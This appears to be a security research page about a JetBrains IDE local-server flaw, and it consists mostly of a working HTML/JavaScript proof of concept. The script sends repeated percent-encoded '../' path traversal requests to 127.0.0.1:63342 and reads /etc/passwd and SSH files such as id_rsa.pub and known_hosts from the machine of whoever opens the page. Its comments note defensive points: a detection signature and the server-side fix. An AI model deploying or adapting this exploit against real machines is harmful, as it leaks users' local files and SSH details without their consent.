JetBrains IDE 远程代码执行和本地文件泄露研究
GitHub 链接
https://github.com/tangxiaofeng7/ide-exp
http://saynotolinux.com/tests/jetbrains/sleuth.html
<!DOCTYPE html>
<html>
<body>
<!--
  Demo controls for the proof of concept.
  The drop-down supplies the file name that the script appends to its
  "../" prefix; the button starts the probe at one parent-directory hop.
  The <pre id="passwd"> element is the only output sink. The script writes
  to it through textContent, so whatever the local server returns is shown
  as plain text and is never parsed as markup.
  The inline onclick handler depends on the global tryTraverse defined in
  the script below; a content security policy that forbids inline handlers
  would stop the button from working.
-->
<form>
  <select id="path">
    <option value="etc/passwd">etc/passwd</option>
    <option value=".ssh/id_rsa.pub">.ssh/id_rsa.pub</option>
    <option value=".ssh/known_hosts">.ssh/known_hosts</option>
  </select>
  <input type="button" value="查看" onclick="tryTraverse(1)">
</form>
<br>
<pre id="passwd"></pre>
<script>
// Output sink: the <pre id="passwd"> element that shows either the fetched
// text or the troubleshooting hint below.
var output = document.getElementById("passwd");

/**
 * Shared failure handler: used when the retry limit is reached and as the
 * XHR error/timeout callback.
 *
 * Replaces the output with a fixed hint. The hint always names /etc/passwd,
 * whichever entry is selected in the drop-down, and states the two
 * preconditions the page relies on: the IDE listening on port 63342 and a
 * project called 'testing' being open.
 */
var err = function () {
  var hint = [
    "Couldn't traverse up to /etc/passwd?\n",
    "Is the IDE bound to 63342? Is the ",
    "'testing' project open?"
  ].join("");
  output.textContent = hint;
};
/**
 * Proof-of-concept probe against the IDE's local web server.
 *
 * Builds a request path of `level` "../" segments followed by the file name
 * chosen in the drop-down, rewrites every "/" as "%2f", and requests it under
 * http://127.0.0.1:63342/testing/. A 200 response is displayed as text; any
 * other status retries with one more "../" segment, up to 20 levels.
 *
 * Review notes (defender's view):
 *  - The page can only show the response if the browser lets it read a
 *    cross-origin reply from 127.0.0.1, i.e. the server's CORS behaviour
 *    permits it. Presumably that was the case on affected builds; confirm
 *    against the vendor advisory, which this page does not cite.
 *  - The requests are recognisable: paths under the project prefix that
 *    contain repeated "..%2f" sequences, one extra per attempt.
 *  - The server-side fix is to decode and normalise the path before checking
 *    that it stays inside the project root.
 *
 * @param {number} level Number of parent-directory hops to try first.
 */
var tryTraverse = function (level) {
  // Stop after 20 hops and show the troubleshooting hint instead.
  if (level > 20) {
    return err();
  }

  var base = "http://127.0.0.1:63342/testing/";

  // `level` copies of "../", then the selected file name.
  var relative = "";
  for (var hop = level; hop > 0; --hop) {
    relative += "../";
  }
  relative += document.getElementById("path").value;

  // Every slash is sent percent-encoded rather than literally.
  var encoded = relative.split("/").join("%2f");

  var request = new XMLHttpRequest();
  request.open("GET", base + encoded, true);
  request.timeout = 2000;
  request.responseType = "text";
  request.onload = function () {
    if (request.status != 200) {
      // Not found at this depth: go one directory higher.
      tryTraverse(level + 1);
      return;
    }
    // textContent keeps the returned file contents from being parsed as HTML.
    output.textContent = request.responseText;
  };
  request.onerror = err;
  request.ontimeout = err;
  request.send();
};

// Runs once when the script loads, before any request has been sent;
// the first probe only starts when the button is clicked.
output.textContent = "running...";
</script>
</body>
</html>